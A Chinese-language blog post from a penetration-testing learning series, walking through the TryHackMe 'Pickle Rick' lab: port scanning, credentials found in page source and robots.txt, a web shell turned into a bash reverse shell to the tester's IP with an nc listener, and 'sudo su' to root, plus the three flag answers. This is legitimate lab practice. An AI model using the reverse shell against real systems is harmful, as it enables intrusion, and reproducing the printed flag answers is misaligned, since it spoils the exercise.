iT邦幫忙

2021 iThome 鐵人賽

DAY 9
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 9

[Day9] THM Pickle Rick

今天來解的題目比較不是尋找公開 Exploit 的方式,而是要靠自己在網頁上尋寶(?),來取得進一步的權限,也比較像 CTF 通靈的題目。

掃 Port

  • nmap -A 10.10.223.99
    • 22 port
    • 80 port

觀察網頁

  • 觀察首頁原始碼
    • 提示 username : R1ckRul3s
  • 觀察 robots.txt
    • Wubbalubbadubdub
    • 發現有一段可能是密碼的字串(?)

Login

  • 在網址後面加上 /login.php 就可以進入登入
    • 使用 Username : R1ckRul3s
    • Password : Wubbalubbadubdub

Webshell

  • 進入後就是一個 webshell
    • 戳成 reverse shell
      • bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
      • 本地端輸入 nc -vlk 7877
      • 就能拿到 shell 了
  • Flag1
    • 在 web 目錄
    • mr. meeseek hair
  • Flag2
    • 在 rick 家目錄
    • 1 jerry tear
  • Flag3
    • 發現可以直接 sudo su
    • 所以就進 root 取得最後一個 flag
    • fleeb juice

上一篇
[Day8] THM Bolt
下一篇
[Day10] THM Anonymous
系列文
我想學滲透測試喵喵喵喵!!!!30

尚未有邦友留言

立即登入留言